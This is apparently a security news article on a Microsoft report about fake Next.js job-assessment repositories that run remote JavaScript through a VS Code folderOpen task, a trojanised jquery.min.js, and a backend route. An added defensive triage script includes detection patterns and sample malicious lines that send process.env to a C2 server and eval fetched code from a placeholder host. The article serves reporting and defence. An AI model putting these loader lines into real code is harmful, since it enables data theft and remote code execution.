A “coordinated developer-targeting campaign” is using malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into executing them and establish persistent access to compromised machines.

“The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week.

The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2).

The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1” to trick job-seeking developers into running them as part of an assessment process.

Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, share the end goal of executing attacker-controlled JavaScript directly in memory:

  • Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. This is done by configuring the task with runOn: “folderOpen”.
  • Build-time execution during application development, where manually running the development server via “npm run dev” is enough to trigger malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js, which fetches a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js.
  • Server startup execution via environment exfiltration and dynamic remote code execution, where launching the application backend causes malicious loader logic concealed within a backend module or route file to be executed. The loader transmits the process environment to the external server and executes JavaScript received as a response in memory within the Node.js server process.
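The three execution paths above each leave a recognisable trace in the repository itself, so they can be triaged before anyone opens the folder in VS Code or runs npm. The following script is an added example and not code from the Microsoft report; it scans an in-memory map of file paths to contents for a folderOpen task, for runtime fetch combined with dynamic code execution, and for serialisation of process.env, using a constructed sample repository with a placeholder host rather than any real indicator.

```javascript
// Added triage script (not from the Microsoft report): flags the three execution
// paths described above in a repository before anyone opens or runs it.
// Works on an in-memory map of relative path -> file text so it runs offline.
const DYNAMIC_EXEC = /\b(?:eval|new\s+Function|vm\.runIn(?:ThisContext|NewContext|Context))\s*\(/;
const REMOTE_FETCH = /\b(?:fetch|https?\.(?:get|request)|axios\.(?:get|post))\s*\(/;
const ENV_SERIALISE = /JSON\.stringify\(\s*process\.env\s*\)/;

// Path 1: VS Code task configured to run as soon as the folder is opened and trusted.
function scanTasksJson(path, text) {
  let tasks;
  try { tasks = JSON.parse(text).tasks || []; }
  catch (e) { // tasks.json may be JSONC (comments, trailing commas); fall back to a regex
    return /"runOn"\s*:\s*"folderOpen"/.test(text)
      ? [{ path, reason: 'task auto-runs on folderOpen (file not strict JSON)' }] : [];
  }
  return tasks
    .filter((t) => t.runOptions && t.runOptions.runOn === 'folderOpen')
    .map((t) => ({ path, reason: `task "${t.label}" auto-runs on folderOpen: ${t.command}` }));
}

// Paths 2 and 3: a vendored library or backend module that fetches code at runtime
// and executes it in-process, optionally after serialising process.env for exfiltration.
function scanJs(path, text) {
  const findings = [];
  if (!DYNAMIC_EXEC.test(text)) return findings;
  if (REMOTE_FETCH.test(text))
    findings.push({ path, reason: 'remote fetch combined with dynamic code execution' });
  if (ENV_SERIALISE.test(text))
    findings.push({ path, reason: 'process.env serialised alongside dynamic code execution' });
  return findings;
}

// Walk the map and apply the right scanner by path; returns findings for manual review.
function triageRepo(files) {
  const findings = [];
  for (const [path, text] of Object.entries(files)) {
    if (path.endsWith('.vscode/tasks.json')) findings.push(...scanTasksJson(path, text));
    else if (/\.(?:m?js|cjs|ts)$/.test(path)) findings.push(...scanJs(path, text));
  }
  return findings;
}

// Constructed sample repository mirroring the three paths (placeholder host, no real IoCs).
const SAMPLE_REPO = {
  '.vscode/tasks.json': JSON.stringify({ version: '2.0.0', tasks: [{ label: 'setup',
    type: 'shell', command: 'node .vscode/setup.js', runOptions: { runOn: 'folderOpen' } }] }),
  'public/js/jquery.min.js': 'fetch("https://loader.example.invalid/a").then(r=>r.text()).then(s=>eval(s));',
  'server/routes/health.js': 'const b=JSON.stringify(process.env);fetch(C2,{method:"POST",body:b})'
    + '.then(r=>r.text()).then(c=>new Function(c)());',
  'pages/index.js': 'export default function Home() { return null; }',
};

for (const f of triageRepo(SAMPLE_REPO)) console.log(`${f.path}: ${f.reason}`);
```

The patterns are deliberately narrow heuristics for a first pass; a hit is a reason to diff the file against its upstream release and read it, not a verdict on its own.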

Microsoft noted that all three methods lead to the same JavaScript payload that’s responsible for profiling the host and periodically polling a registration endpoint to get a unique “instanceId” identifier. This identifier is subsequently supplied in follow-on polls to correlate activity.

It’s also capable of executing server-provided JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial foothold into a persistent access pathway for receiving tasks by contacting a different C2 server and executing them in memory to minimize leaving traces on disk.

Attack chain overview

“The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint,…


Last Update: February 26, 2026